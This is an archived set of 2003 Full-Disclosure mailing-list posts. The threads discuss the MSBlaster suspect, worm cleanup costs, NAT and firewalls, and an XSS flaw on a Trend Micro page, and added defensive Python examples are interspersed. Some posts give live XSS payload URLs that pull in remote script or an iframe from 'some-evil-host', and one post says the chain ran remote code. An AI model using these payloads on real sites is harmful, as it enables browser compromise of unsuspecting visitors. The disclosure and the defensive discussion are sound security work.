On Fri, 29 Aug 2003 15:47:22 CDT, Jerry Heidtke said: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a No, given that it only hit 7,000 systems, it probably took 5 days before they got a copy of the binary and somebody who was computer forensics trained and not allocated to the main Blaster or Nachi work, and get them to the same place at the same time. And then a very long afternoon documenting the steps they took using Google. Remember that it's OK for *us* to say yeah, that's probably him. The FBI does it, they have to make *really* sure they aren't googling for the wrong 'teekid' - first they have to convince a judge they have the right guy, and if they still screw up and bash down the door of a 97-year-old woman who dies of a heart attack of fright (yes, that DID happen recently), they end up with serious egg on their faces.
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
Chris DeVoney [EMAIL PROTECTED] wrote: On Friday, August 29, 2003 8:24 AM, Charles Ballowe wrote: Interesting -- the net cost of the worm is actually a net $0.00. For every penny that a company chalks up as a cost to the worm, some other company must be chalking up the cost as a profit from the worm. Forgive the comment, but that statement is very untrue. As someone else hinted, companies are diverting manpower from other projects to tackle the worm. No other company is benefiting from that expenditure. Wrong. In at least some of those cases those extra resources are simply hastily applying the fixes and better preventative measures that should already have been applied or in place. Thus the _rest of the Internet_ benefits from that expenditure and therefore the site being fixed not only directly benefits (it will no longer be vulnerable to attack through this and related and highly obvious, even if not previously used in exploits against it, mechanisms) but indirectly (through its efforts and those on other previously inadequately configured systems, the Internet as a whole is a better place, meaning it is a better place for this site too). Then there is the case of academic and medical establishments, of which I can speak from experience. There were some additional costs in hiring contractors. But the biggest cost was the diversion of (my estimate) hundreds of man-weeks to analyzing, patching, remediating, mitigating these worms from other projects. That wasn't money lost, that was time lost. And the faculty, staff, students, and everyone who depends on that work loss. ...which clearly was never suitably factored into the initial design, roll-out and ongoing management of the systems in those establishments. If they paid out big now to fix this one-off (yeah, right...) 
incident, why did they not pay the little more up front to ensure they had well-designed, properly secured and easily managed systems that would have _prevented_ all those losses you are now bleating about? Why not? Simple -- they decided it was better to save a few grand and get four more PCs (or a couple of kick-arse systems to slake the sysadmins' thirsts for Quake, or whatever...). False economy. Always was, always is and always will be. Do it once, do it right. There was no rocket science in being prepared to be anything other than mildly inconvenienced by Blaster -- sure, outside machines or machines with outside network connections that are also inside your site can be a hassle, but quality network gear allowing you to turn those machines off outlet by outlet is available and has been forever (though again, yes it costs a few bucks more up-front). Further, as such paths have always been stupefyingly obvious entrance points for this kind of attack, protecting against them should always have been factored into the design and thus not be something to be hand-wringing over after the latest attack. I won't go into fuller details, but because of the heavy dependence of computing in biotechnology and medical fields, these worms and other security problems have a larger societal cost. Which _surely_ raises questions about the sanity of anyone who would consider connecting such critical stuff to a sewer of a network like the Internet as we have it, and doubly so to actually make such connections without taking _extremely_ careful and well thought through protective measures. It also raises serious questions about the sanity of the funding processes and groups that dole out the money driving these projects. ... Most university medical research comes from fixed grants. When you are always trying to make those limited resources stretch, diverting money and time to nonsense like this is very, very frustrating. 
These problems do delay medical research and add to the cost of medical research without giving human benefits. Which makes it all the more imperative that the tax dollars funding you are deployed to best effect _up front_ rather than inefficiently and all topsy turvy when half the campus is running around like chooks with their heads cut off, no?? I wish these miscreants would consider those implications before converting a lab server into a warez server when they get hit with a leading-edge or rare illness. Yeah, right, don't we all... In the meantime however, the US tax payers expect you (I don't mean you personally, more you, the IT staff at such institutions collectively) to do something more effective with the contributions they make... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 7:13 PM -0400 [EMAIL PROTECTED] wrote: You're totally missing the point. And this surprises you? If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things. [skip the long litany of *other* things you could be doing] In case anybody thinks that Valdis is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right. And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. That won't stop anyone from trying though. They actually think security is the stuff you *should* be doing, not helping your users be more productive. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Selfmade worms in the wild ;)
more fun: why didn't you try: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&VName=WORM_MSBLAST.%3Cscript%20type='text/javascript'%3Ealert('boo!')%3C/script%3E i think one can pass almost any xss there (citing http://www.trendmicro.com/en/about/profile/overview.htm : Trend Micro Incorporated is a global leader in antivirus and Internet content security software and services) do they test their internet content security software on their own pages? greetz knitti Attention, that's joke-trash: http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55745&VName=WORM_MSBLAST.G http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&VName=WORM_MSBLAST.Z You can change id's and names... -mo- -- == G.P Online-Redaktion === Kryptocrew .: your security advisor team :. mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
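Added illustration of the bug knitti is pointing at, not code from the thread and not Trend Micro's: the VName query parameter is decoded and echoed straight into the page, so a URL carries the script into the victim's browser. The URLs below are reconstructed from the two quoted above with the '&' between parameters restored (the archive's extraction dropped it). The allowlist shape for a virus name is an assumption; the thread says nothing about the site's real naming rules.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs modelled on the ones quoted in the thread.
BENIGN_URL = ("http://de.trendmicro-europe.com/enterprise/security_info/"
              "ve_detail.php?id=55745&VName=WORM_MSBLAST.G")
XSS_URL = ("http://de.trendmicro-europe.com/enterprise/security_info/"
           "ve_detail.php?id=55756&VName=WORM_MSBLAST."
           "%3Cscript%20type='text/javascript'%3Ealert('boo!')%3C/script%3E")

# Assumed allowlist: FAMILY_NAME with optional .VARIANT parts, nothing else.
VNAME_RE = re.compile(r"^[A-Z0-9_]+(\.[A-Z0-9_-]+)*$")
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def extract_vname(url: str) -> str:
    """Percent-decode the VName parameter the way the server sees it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("VName", [""])[0]


def is_valid_vname(vname: str) -> bool:
    """Input validation: reject anything not shaped like a virus name."""
    return VNAME_RE.fullmatch(vname) is not None


def render_unsafe(vname: str) -> str:
    """The pattern the thread describes: the parameter lands in the HTML as-is."""
    return f"<h1>Virus Encyclopedia: {vname}</h1>"


def render_encoded(vname: str) -> str:
    """Defence 1, output encoding: the browser shows the payload as text."""
    return f"<h1>Virus Encyclopedia: {html.escape(vname, quote=True)}</h1>"


def render_safe(vname: str) -> str:
    """Defence 1 + 2: validate on the way in, encode on the way out, and do not
    echo a rejected value at all, so there is nothing for the attacker to reflect."""
    if not is_valid_vname(vname):
        return "<h1>Virus Encyclopedia: unknown name</h1>"
    return render_encoded(vname)


def echoes_script(page: str) -> bool:
    """Crude check used to show the difference: a live <script> tag in the output."""
    return SCRIPT_TAG.search(page) is not None
```

Encoding alone is enough to stop this particular payload; the allowlist is there because a name field with a known shape should never accept angle brackets in the first place, and because rejecting early keeps attacker-controlled text out of error pages and logs as well.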
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
Well, sounds like to me, they have lost focus and are looking for a quick scapegoat to me. Again, probably driven by media pressures and others to show half-ass results based on half-ass analysis. -b On Fri, 2003-08-29 at 17:33, Brent Colflesh wrote: I'm sure that the FBI would never exaggerate the extent of the damage, in order to look like they were busting a major hacker after a difficult investigation instead of some kid like millions of others with more time and anger than skills. Don't belittle the heroic efforts of the FBI - if you do, then the terrorists win! ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 2003-08-29 at 18:35, Richard M. Smith wrote: The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Haha, jeez man? and you're volunteering to supervise him right? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] The Jeffrey Parson criminal complaint is online
http://news.findlaw.com/nytimes/docs/cyberlaw/usparson82803cmp.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 2003-08-29 at 19:13, [EMAIL PROTECTED] wrote: On Fri, 29 Aug 2003 14:46:32 PDT, morning_wood said: And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively?? that is his job You're totally missing the point. If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things. ??? uh, the extended coffee breaks? That's 30 hours I'm not spending helping do network performance tuning for the mail server. I'm sure the 70,000 users of the mail server would prefer that I was able to do that instead. You mean... Member of the Exchange server mop broom crew? That's 30 hours I'm not spending designing a new, more featureful print management system. I'm sure the people who get print jobs that we need to keep running (accounts receivable, invoices, purchase orders, etc) would prefer I was able to do that instead. Your printer says it needs white toner. That's 30 hours I'm not spending diagnosing compiler and kernel bugs. I'm sure the researcher who has a $2M grant project dead in the water would prefer I was able to do that instead. That's 30 hours I'm not spending working on a way to migrate users from Windows to Linux. I'm sure the people who are looking at a $500K/year bill for Microsoft licenses (and want a way to save money) would prefer I was able to do that instead. That's 30 hours I'm not spending deploying a new release of Listserv that has features that my users are asking for. I'm sure that many of the users on our 6,023 lists would prefer I was able to do that instead. You starting to see a pattern here? Jack of all trades? And yes, those are *ALL* things that are *part of* my job. Many of them are things I'd enjoy doing more. All of them are things that would provide more *direct* benefit to my site than doing security. 
And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Lets discuss, Firewalls...
Home and business firewalls Question to ponder: OK, on my home LAN I have set up a windows NT4.0 SP2 box with IIS and SQL Server 7.0. No hot fixes on the box at all. I run a NESSUS scan and I get over 500 available exploits for this box. My outside address is 216.144.100.100 (not really so please do not attack whoever that is) The box on the inside is 192.168.0.100/24 Admin password is blank. All IPC$ shares are there. I can surf the web from the box so it is fine. I have no firewall, just a NAT on the Motorola Surfboard and no 1 to 1 NATing. If you serve NO applications from the inside of your network (no publicly accessible web server, email server, ftp server etc...), and you have a NAT router so your addressing on the inside or your home or business is private (i.e. 192.168.0.x, 10.10.10.x, 172.16.1.x) Can you get to it? How? Do you still need a firewall? Why? Mike
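An added example, not from Mike's post, to reason about his question with something that runs. It models the one thing a plain NAT box does for you, a connection-tracking table of translations the inside host created, and shows what that stops and what it lets through. The addresses and ports are the ones from the post; the remote addresses, the idle timeout and the endpoint-dependent filtering (only the peer the inside host talked to may use a mapping) are assumptions, and many home NAT devices of the period were more permissive than that.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Addresses from the post (the public one is the poster's placeholder).
PUBLIC_IP = "216.144.100.100"
INSIDE_HOST = "192.168.0.100"
MAPPING_TTL = 300.0   # assumed: seconds an idle translation survives

Key = Tuple[str, int, str, int]   # inside_ip, inside_port, remote_ip, remote_port


@dataclass
class Nat:
    """Port-overloading NAT: a translation table and nothing else. No rules,
    no inspection, no egress policy; those are what a firewall would add."""
    public_ip: str
    ttl: float = MAPPING_TTL
    next_port: int = 40000
    # public_port -> (key, last_seen)
    table: Dict[int, Tuple[Key, float]] = field(default_factory=dict)

    def outbound(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int,
                 now: float) -> int:
        """An inside host sends a packet out: reuse or create a translation."""
        key: Key = (src_ip, src_port, dst_ip, dst_port)
        for pub, (k, _) in self.table.items():
            if k == key:
                self.table[pub] = (k, now)
                return pub
        pub = self.next_port
        self.next_port += 1
        self.table[pub] = (key, now)
        return pub

    def inbound(self, src_ip: str, src_port: int, dst_port: int,
                now: float) -> Optional[Tuple[str, int]]:
        """A packet from the Internet arrives at public_ip:dst_port. Return the
        inside endpoint it is forwarded to, or None if it is dropped."""
        entry = self.table.get(dst_port)
        if entry is None:
            return None                        # no state: unsolicited, dropped
        (i_ip, i_port, r_ip, r_port), last = entry
        if now - last > self.ttl:
            del self.table[dst_port]           # translation idled out
            return None
        if (src_ip, src_port) != (r_ip, r_port):
            return None                        # assumed endpoint-dependent filtering
        self.table[dst_port] = ((i_ip, i_port, r_ip, r_port), now)
        return (i_ip, i_port)


def scenario() -> Dict[str, Optional[Tuple[str, int]]]:
    """Walk through the poster's setup. Remote addresses are constructed."""
    nat = Nat(PUBLIC_IP)
    t = 1000.0
    out: Dict[str, Optional[Tuple[str, int]]] = {}
    # 1. Someone scans the public address for the NT box's IIS and SMB ports.
    out["scan_80"] = nat.inbound("198.51.100.9", 1234, 80, t)
    out["scan_445"] = nat.inbound("198.51.100.9", 1235, 445, t)
    # 2. The poster surfs the web from the NT box: outbound state is created ...
    pub = nat.outbound(INSIDE_HOST, 1027, "203.0.113.5", 80, t)
    # ... and whatever that web server sends back is delivered to the box.
    out["reply_from_server"] = nat.inbound("203.0.113.5", 80, pub, t + 1)
    # 3. A third party that guesses the public port does not match the state.
    out["hijack_attempt"] = nat.inbound("198.51.100.9", 80, pub, t + 2)
    # 4. Once the translation idles out, even the server cannot reach in.
    out["reply_after_ttl"] = nat.inbound("203.0.113.5", 80, pub,
                                         t + 1 + MAPPING_TTL + 10)
    return out
```

What it shows: the unsolicited probes at 80 and 445 go nowhere, which is the protection Mike is relying on. The moment the NT box opens a connection (he says he surfs the web from it), whatever the remote side sends back is delivered, so hostile content pulled in by the box itself is the way in, and once anything is on the LAN the NAT does nothing about the 500 Nessus findings. A firewall adds what this table lacks: a policy on what the inside may initiate, and inspection of what comes back.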
Re: [Full-Disclosure] GOOD: A legal fix for software flaws?
Gregory Steuck wrote: Jeremiah == Jeremiah Cornelius [EMAIL PROTECTED] writes: Jeremiah Administration for Windows networks is similar to Jeremiah maintaining a 12-year old GM Truck. Brand new, W2K+3 Jeremiah already has 190K miles of wear. Where did you get this gem? It is hilarious, it brightened up my day. I am the regretful owner of a '91 Blazer S10 Tahoe. The parallel in these experiences is altogether too apparent to me. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: (SPAM?) [Full-Disclosure] Lets discuss, Firewalls...
Nice try binky.

Content analysis details: (5.60 hits, 5 required)
HOME_EMPLOYMENT (1.6 points) BODY: Information on how to work at home (2)
HTML_FONT_FACE_ODD (0.1 points) BODY: HTML font face is not a commonly used face
HTML_60_70 (0.5 points) BODY: Message is 60% to 70% HTML
HTML_MESSAGE (0.1 points) BODY: HTML included in message
KNOWN_MAILING_LIST (-0.5 points) Email came from some known mailing list software
FORGED_MUA_OUTLOOK (3.7 points) Forged mail pretending to be from MS Outlook
MISSING_OUTLOOK_NAME (0.1 points) Message looks like Outlook, but isn't

-jim

Mike @ Suzzal.net wrote: Home and business firewalls Question to ponder: blah, blah, blah... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
My life sucks - was Re: [Full-Disclosure] Authorities eye MSBlastersuspect
I must say, you folk are overworked and I think that you harbor a slight grudge because of it.

In case anybody thinks that XX is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right.

An example was given where projects were on hold for whatever reason. I believe those projects were impacted severely by a lack of productivity while the network was down too. To take it a little bit further, a lot of other projects that generate the revenue that contributes to the grants that fund the projects were impacted because of the insecurity of systems as a whole. I think we can all agree that the EDU is as damaging as the high speed home user in this respect. The issue I take is that the EDU has an opportunity to mitigate these issues in part through policy and education. The home user is a much more difficult challenge.

And you can't weasel out by saying Hire somebody else to do that other stuff or hire somebody else to do security - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then.

Kudos to all administrators for taking on the task of managing and running a challenging environment. I fear that the problems you face are not easily resolved at your level and that there is a lot more work to be done to raise the awareness at all levels. You have chosen to take on this challenge by your decision to continue to work there, please quit telling us how difficult it is and why you cannot do it and spend that time doing it and explaining how you did it. I understand that it will take longer and I understand that it is frustrating and I understand that it is...

Truth is you choose to continue to work there and be security aware, so please contribute to the solution and not defend your problems.

That won't stop anyone from trying though. They actually think security is the stuff you *should* be doing, not helping your users be more productive.

Like it or not security is a part of the job and failure to execute is not just your problem, we all feel the impact. Don't like the work, change your life, go sell something at your local retail store and have fun every day when you are off instead of should be off.

I believe that _proper_ security will help your users be more productive, not just the act of patching and patching but employing the methodologies behind proper security. What would have been the impact to productivity had this worm of the day deleted all .doc files and then filled the remaining disk with random chars?

People sit here on this list defending the problems and issues they face, giving those that might be facing similar problems a reason to ignore it because XYZ is not solving it either. The reality is that you can be by presenting how you solved problems given the limited budget and resources available and help those facing similar challenges instead of giving them reasons to ignore them and complaining all the time.

Tis all I am going to say about that.
HIS life sucks Re: [Full-Disclosure] Authorities eye MSBlaster suspect
Teekid defacement of MNGFOA (Minnesota Government Finance Officers Association): http://www.google.ca/search?q=cache:LxFv6TNMbqIJ:www.mngfoa.org/start_page.htm

Teekid trying to get some trojan cgi-notify to work? http://www.webmasterworld.com/forum10/978.htm

Teekid discussing irc-based trojan: http://www.trojanforge.net/showthread/t-2162.html

I really hope he ends up in jail. That would scare a few million kiddies, at least. :)
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
In some mail from [EMAIL PROTECTED], sie said:

[...] That's 30 hours I'm not spending helping do network performance tuning [...]

You know, I read through that list and saw numerous things that you shouldn't have to do, besides clean up from worms and viruses. If you feel you are so short on time, maybe you need to talk to HR about hiring you an assistant who can take care of the drudgery and leave you to concentrate on the really important stuff.
Re: [Full-Disclosure] Selfmade worms in the wild ;)
well... let's see, we could make it an untrusted link by

http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756;VName=WORM_MSBLAST.<script language=JavaScript src=http://www.astalavista.com/backend/news.js type=text/javascript></script>

and include some remote javascript of our choice, or the latest IE ADODB exploit. The obvious choice for that would be the classic..

http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756;VName=WORM_MSBLAST.<iframe src=http://some-evil-host/script/orhtml/etc/bla/></iframe>

for everyone's info, the above was tested with the ADODB exploit to execute remote code... successfully I might add. (unpatched IE)

this goes to show that XSS is still very much a security concern, especially coupled together with the latest browser exploit to become a very dangerous vector of attack, especially by way of a previously trusted URL. this is not looking real good for trend. good job Mo 8-)

morning_wood http://exploitlabs.com http://e2-labs.com

- Original Message - From: Redaktion-Kryptocrew [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, August 29, 2003 12:02 AM Subject: [Full-Disclosure] Selfmade worms in the wild ;)

You can change id's and names... -mo- Kryptocrew .: your security advisor team :. mailto:[EMAIL PROTECTED]
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
I can say this is the same for some companies in corporate America. I currently have to split my time working on security issues for the systems I control (100 Solaris, 200 Linux) and self-improvement projects like implementing AFS, if there are currently no hair-on-fire events while the rest of the team is out.

On Fri, 29 Aug 2003, Paul Schmehl wrote:

In case anybody thinks that Valdis is somehow bragging, forget it. The many roles he is expected to fulfill are typical in a university environment. There *is* no such thing as an intrusion detection specialist. Everyone in edu wears many hats - most of which are fulltime jobs in their own right.
Re: [Full-Disclosure] Lets discuss, Firewalls...
Admin password is blank. All IPC$ shares are there. I can surf the web from the box so it is fine.

The security industry has a saying: crunchy on the outside, chewy on the inside. EASY to get inside your computer with your help. Once done, you are 0wn8d.

You can hit a malicious web site and automatically start running ActiveX controls.
You can receive a 'day 0' virus that runs on your computer.
You can get a call from the FBI (like 19 others did last week, and 318 did on September 13th, 2001) saying that they suspect that either you are a hacker or terrorist, or your computer has been taken over by a hacker or terrorist.
You can have all your data wiped out, owned, cookies taken (where PIN numbers, passwords and bank accounts might be).
You can have spyware loaded that will keep track of all of your keystrokes, including PIN numbers, passwords and bank accounts.
You can get your ISP to cut you off due to activity that you didn't even see happening.

If you serve NO applications from the inside of your network (no publicly accessible web server, email server, ftp server etc...), and you have a NAT router so your addressing on the inside or your home or business is private (i.e. 192.168.0.x, 10.10.10.x, 172.16.1.x)

Those 20 systems that were to SERVE UP the Sobig.F upgrade were running on programs, not servers (except that which the hacker put on).

Do you still need a firewall? Why?

You need more than a firewall. says top 7 mistakes users make, #4 (I think) is: Relying primarily on a firewall. You need to practice 'safe hex' in all that that means.

-- Michael Scheidell, CEO SECNAP Network Security, LLC Sales: 866-SECNAPNET / (1-866-732-6276) Main: 561-368-9561 / www.secnap.net Looking for a career in Internet security? http://www.secnap.net/employment/
[Full-Disclosure] ... ... ...
Hey folks, I think I now know why the chat isn't interpreting PHP commands, only HTML... it's because my friend's code is so rudimentary that when you type a sentence, that sentence is saved to a txt file: http://www-lugal.no-ip.org/vargthon/testes/chat.txt and then that file is shown to you and updated successively... I think that's the reason... [ ]'s
[Full-Disclosure] MS Blaster author / morning_wood misinformed
Hi Donald,

Interesting (child-like) thoughts, but in reality, this society we live in has laws. If a person leaves the door to their home unlocked one evening (consciously or mistakenly) and someone chooses to go inside and ransack the place, sure, the homeowner probably should have locked the door, but doing so didn't give the attacker just cause to go inside and cause the person grief. It's still a crime. And if caught, the result will still be the same whether you're in the USA, Canada, Germany or China... Do not pass go. Do not collect $200. Go directly to jail (or at least pay some fines).

Darren

From: morning_wood [EMAIL PROTECTED] To: Charles Ballowe [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Authorities eye MSBlaster suspect Date: Fri, 29 Aug 2003 09:18:48 -0700

if the worm was active in anticipation of a patch that introduced a new exploit vector and it took advantage of that, isn't the vendor (Microsoft) to blame then? As well there was plenty of advance warning on this exploit long before msblast was an issue. It seems to me that it is each admin's responsibility, if they were affected (infected), not the coder. if this were the case the Last Stage of Delirium would be the blamed party for developing and releasing the exploit, but alas.. they are not of USA origin.

SUE LITIGATE BLAME PROSECUTE

as long as the general public remains uneducated (and many Fortune 500 admins) we will continue to see this type of action against coders for blame, not the people actually responsible for allowing their infrastructure to become targets in the first place. im sure this ignorance is a byproduct of the weak mind of most Americans as they are in a constant state to blame others for their own problems, this can be seen everywhere in today's American society... commonly referred to as the poor me syndrome..

Q. why did you murder the victim? A. my father never told me he loved me (real answer - you pulled the trigger)

Q. why was my network compromised? A. because of someone else (real answer - you suck at internet)

muh 2 bytes, morning_wood
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
[EMAIL PROTECTED] [2003:08:29:20:56:30-0400] scribed:

On Fri, 29 Aug 2003 15:47:22 CDT, Jerry Heidtke said:

It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a

No, given that it only hit 7,000 systems, it probably took 5 days before they got a copy of the binary and somebody who was computer forensics trained and not allocated to the main Blaster or Nachi work, and got them to the same place at the same time. And then a very long afternoon documenting the steps they took using Google.

Remember that it's OK for *us* to say yeah, that's probably him. The FBI does it, they have to make *really* sure they aren't googling for the wrong 'teekid' - first they have to convince a judge they have the right guy, and if they still screw up and bash down the door of a 97-year-old woman who dies of a heart attack of fright (yes, that DID happen recently), they end up with serious egg on their faces.

OK, they nabbed a nickel-bagger; let's not get carried away!

This kid is small potatoes, compared to other vermin spreaders, and we -- on this list, at least -- know that as fact.

It's one thing to make an example of this kid; it's quite another thing to put a lid on this whole wormy Internet thingy . . .

-- Best Regards, mds - Dare to fix things before they break . . . - Our capacity for understanding is inversely proportional to how much we think we know. The more I know, the more I know I don't know . . .
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Saturday, August 30, 2003 9:24 AM -0500 Michael D Schleif [EMAIL PROTECTED] wrote:

OK, they nabbed a nickel-bagger; let's not get carried away! This kid is small potatoes, compared to other vermin spreaders, and we -- on this list, at least -- know that as fact. It's one thing to make an example of this kid; it's quite another thing to put a lid on this whole wormy Internet thingy . . .

Trust me, work is being done to catch other ones as well.

Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu
Re: [Full-Disclosure] Lets discuss, Firewalls...
On August 29, 9:33 pm Mike @ Suzzal.net [EMAIL PROTECTED] wrote:

Can you get to it? How?

Possibly. Source routed packets.

Do you still need a firewall? Why?

Yes. To block source routed packets. There may be a registry setting to not accept source routed packets on Windows... I'm not sure. On Linux you'd:

echo 0 > /proc/sys/net/ipv4/conf/<interface>/accept_source_route

Do that once for each interface on your box.

Another reason to have a firewall is to limit outbound traffic. Say you click on an email file attachment (i.e. a really 'wicked' screensaver ;) and your box gets infected with some worm. Do you really want your box to be able to advertise to the world that it's infected and possibly infect other boxes?

--Ben
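The two firewall answers in this thread (Scheidell's "you need more than a firewall" and Ben's source-routing and egress-filtering points), carried through as one added example that is not code from the list or from any poster. It audits the accept_source_route knob for every interface and emits a minimal default-deny iptables ruleset for a box that serves nothing. The proc_root parameter, the interface name eth0, the outbound port list (53, 80, 443) and the build_fake_proc() helper that constructs a throwaway /proc tree are all assumptions for illustration; nothing is applied unless dry_run=False, which needs root on a Linux host with iptables.

```python
"""Audit accept_source_route and generate a default-deny egress ruleset.

Added example (not code from the list thread). Assumptions: proc_root points
at a real or constructed /proc tree; eth0 and the outbound port list are
illustrative; rules are only printed unless dry_run=False.
"""
import os
import shlex
import subprocess
import tempfile

CONF_SUBDIR = os.path.join("proc", "sys", "net", "ipv4", "conf")


def audit_source_route(proc_root="/"):
    """Return {iface: value} for every conf/<iface>/accept_source_route knob.

    1 means the kernel honours source-routed packets on that interface, so an
    outside host can steer a packet to the RFC 1918 address behind the NAT.
    The kernel consults both conf/all and the per-interface knob, so both
    should read 0 on a host that is not a router.
    """
    conf = os.path.join(proc_root, CONF_SUBDIR)
    result = {}
    if not os.path.isdir(conf):
        return result
    for iface in sorted(os.listdir(conf)):
        knob = os.path.join(conf, iface, "accept_source_route")
        try:
            with open(knob) as fh:
                result[iface] = int(fh.read().strip() or "0")
        except (OSError, ValueError):
            continue
    return result


def sysctl_fixes(audit):
    """sysctl.conf lines that switch off source routing wherever it is on."""
    return [f"net.ipv4.conf.{iface}.accept_source_route = 0"
            for iface, value in audit.items() if value != 0]


def egress_rules(wan="eth0", tcp_out=(53, 80, 443), udp_out=(53,)):
    """iptables commands for a box that serves nothing and talks out on few ports.

    INPUT drops by default and only admits replies to our own connections.
    OUTPUT also drops by default: a worm scanning 135/tcp or calling back on
    4444/tcp (Blaster's ports) is stopped at the box, and the attempt logged.
    """
    rules = [
        "iptables -P INPUT DROP",
        "iptables -P FORWARD DROP",
        "iptables -P OUTPUT DROP",
        "iptables -A INPUT -i lo -j ACCEPT",
        "iptables -A OUTPUT -o lo -j ACCEPT",
        f"iptables -A INPUT -i {wan} -m state --state ESTABLISHED,RELATED -j ACCEPT",
        f"iptables -A OUTPUT -o {wan} -m state --state ESTABLISHED,RELATED -j ACCEPT",
    ]
    for port in tcp_out:
        rules.append(f"iptables -A OUTPUT -o {wan} -p tcp --dport {port} "
                     "-m state --state NEW -j ACCEPT")
    for port in udp_out:
        rules.append(f"iptables -A OUTPUT -o {wan} -p udp --dport {port} "
                     "-m state --state NEW -j ACCEPT")
    rules.append(f"iptables -A OUTPUT -o {wan} -j LOG --log-prefix 'EGRESS-DROP: '")
    return rules


def allows_outbound(rules, proto, port):
    """Would egress_rules() let a NEW outbound proto/port connection through?"""
    needle = f"-p {proto} --dport {port} "
    return any(needle in rule and rule.endswith("-j ACCEPT") for rule in rules)


def apply_rules(rules, dry_run=True):
    """Print (dry run) or execute each rule without a shell; returns count."""
    for rule in rules:
        if dry_run:
            print(rule)
        else:
            subprocess.run(shlex.split(rule), check=True)
    return len(rules)


def build_fake_proc(values):
    """Construct a throwaway /proc-like tree from {iface: accept_source_route}."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    for iface, value in values.items():
        d = os.path.join(root, CONF_SUBDIR, iface)
        os.makedirs(d)
        with open(os.path.join(d, "accept_source_route"), "w") as fh:
            fh.write(f"{value}\n")
    return root


if __name__ == "__main__":
    for line in sysctl_fixes(audit_source_route("/")):
        print(line)
    apply_rules(egress_rules(), dry_run=True)
```

Run it on the live box with proc_root="/" to see which interfaces still accept source-routed packets and what sysctl lines would close them; the OUTPUT chain is the part that answers Ben's second point, since an infected host that can only reach 53, 80 and 443 outbound cannot spray 135/tcp at the rest of the Internet.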
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Hi!

Interesting (child-like) thoughts, but in reality, this society we live in has laws. If a person leaves the door to their home unlocked one evening (consciously or mistakenly) and someone chooses to go inside and ransacks the place. Sure the homeowner probably should have locked the door, but doing so didn't give the attacker just cause to go inside and cause the person grief. It's still a crime. And if caught, the result will still be the same whether you're in the USA, Canada, Germany or China... Do not pass go. Do not collect $200. Go directly to jail (or at least pay some fines).

I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own.

Groetjes, Peter Busser

-- The Adamantix Project Taking trustworthy software out of the labs, and into the real world http://www.adamantix.org/
